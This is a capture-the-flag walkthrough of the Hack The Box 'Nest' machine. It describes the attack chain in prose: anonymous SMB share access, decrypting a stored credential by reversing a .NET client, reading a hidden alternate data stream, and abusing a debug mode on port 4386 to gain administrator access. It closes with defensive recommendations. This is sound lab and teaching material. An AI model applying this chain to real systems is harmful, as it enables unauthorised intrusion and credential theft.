Walkthrough of the Nest machine on Hack The Box.
Recon
Primary exposure was SMB (445) plus a custom service on 4386.
The custom port banner identified:
HQK Reporting Service V1.2- commands like
LIST,SETDIR,RUNQUERY, andDEBUG
That service became key later in the chain.
SMB enumeration
Anonymous/low-priv share access revealed:
Data(read)Users(read)- later
Secure$withTempUsercredentials
From share content, I collected:
- usernames
- config files with encrypted credentials
- references to internal files used by HQK tooling
Credential recovery path
RU_config.xml contained:
- username:
c.smith - encrypted password blob
I pulled the related .NET application and reversed/debugged it to recover the cleartext password used by the tool.
That gave access to additional user data and the C.Smith path.
Alternate data stream discovery
In C.Smith\HQK Reporting, Debug Mode Password.txt looked empty at first.
Using SMB metadata (allinfo), I identified an alternate stream:
Debug Mode Password.txt:Password
Reading that stream exposed the HQK debug password.
HQK service abuse (port 4386)
Connecting to 4386 and entering debug mode unlocked extra commands like SHOWQUERY.
By browsing directories and showing query content, I recovered LDAP config values including:
- domain context
Administratoraccount reference- encrypted password blob
I then repeated the same reverse/debug approach used earlier to decrypt the final credential material.
Privileged outcome
With recovered high-priv credentials, I completed access and retrieved the final flag.
Key takeaways
- Readable SMB shares often leak enough context for full compromise.
- App-level “encrypted” credentials are not secure if decryption logic ships with the client.
- Alternate data streams can hide critical secrets from casual file review.
- Internal custom services with debug features are high-risk when weakly protected.
Defensive recommendations
- Minimize anonymous/guest SMB exposure and enforce least privilege on shares.
- Remove reversible credential storage from desktop/service tooling.
- Monitor for ADS usage and unusual SMB file stream access patterns.
- Disable or strictly gate debug functionality in production services.